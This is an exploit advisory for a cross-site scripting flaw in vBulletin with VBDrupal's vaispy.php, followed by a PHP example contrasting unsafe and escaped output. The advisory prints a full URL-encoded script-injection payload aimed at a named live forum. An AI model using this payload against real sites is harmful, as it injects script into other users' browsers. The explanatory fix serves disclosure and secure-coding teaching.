# Exploit Title: VBDrupal Cross Site Scripting
# Date: 6.01.2012
# Author: Sony
# Software Link: http://drupal.org/download
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/01/vbdrupal-cross-site-scripting.html

..................................................................

I found this only in http://forums.techarena.in. This is vBulletin 3.6.4 with VBDrupal.

We can see XSS in /vaispy.php?do= when I replace xml with php.

GET /vaispy.php?do=xml&last=5538926&r=0.73766774241121&forumids=&noChildren=0&_=

/vaispy.php?do=xml = /vaispy.php?do=php

Result:

http://forums.techarena.in/vaispy.php?do=php&last=5538926&r=0.73766774241121&forumids=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/FK9D6DfRtgk%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E

Greetz: AltaiR from hackzona.ru
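The PoC payload opens with `';` and `";`, the shape used when a request parameter has been interpolated into a quoted JavaScript string inside a server-generated script. The following is an added example, not vBulletin's or VBDrupal's code: a hypothetical PHP handler (`render_unsafe`, `render_safe`, `validate_forumids` are assumed names) showing that pattern beside a form that emits the value as a JSON literal and rejects anything that is not a list of numeric ids.

```php
<?php
// Hypothetical handler, modelled on a page that echoes the forumids
// request parameter into an inline <script>. Illustrative only.

// UNSAFE: the raw parameter is concatenated into a JavaScript string
// literal. A value containing ' or " terminates the literal and the rest
// of the input is parsed as code; a </script> in it ends the block early.
function render_unsafe(string $forumids): string {
    return "<script>var forumids = '" . $forumids . "';</script>";
}

// SAFE: emit the value as a JSON literal. The JSON_HEX_* flags turn
// <, >, ', " and & into \uXXXX escapes, so the output cannot contain a
// quote that closes the literal or a </script> that closes the block.
function render_safe(string $forumids): string {
    $literal = json_encode(
        $forumids,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
    );
    return "<script>var forumids = " . $literal . ";</script>";
}

// Defence in depth: the parameter is meant to be a comma-separated list
// of numeric ids (or empty), so any other content is refused outright.
function validate_forumids(string $forumids): ?string {
    if ($forumids === '' || preg_match('/^\d+(,\d+)*$/', $forumids) === 1) {
        return $forumids;
    }
    return null;
}

// Constructed input with the same opening characters as the PoC.
$input = "';alert(1)//</script>";
echo render_unsafe($input), "\n";
echo render_safe($input), "\n";
var_dump(validate_forumids($input));
var_dump(validate_forumids("12,34"));
```

Comparing the two `echo` lines shows the unsafe output ending the string literal at the injected quote, while the safe output keeps the whole value inside one escaped literal.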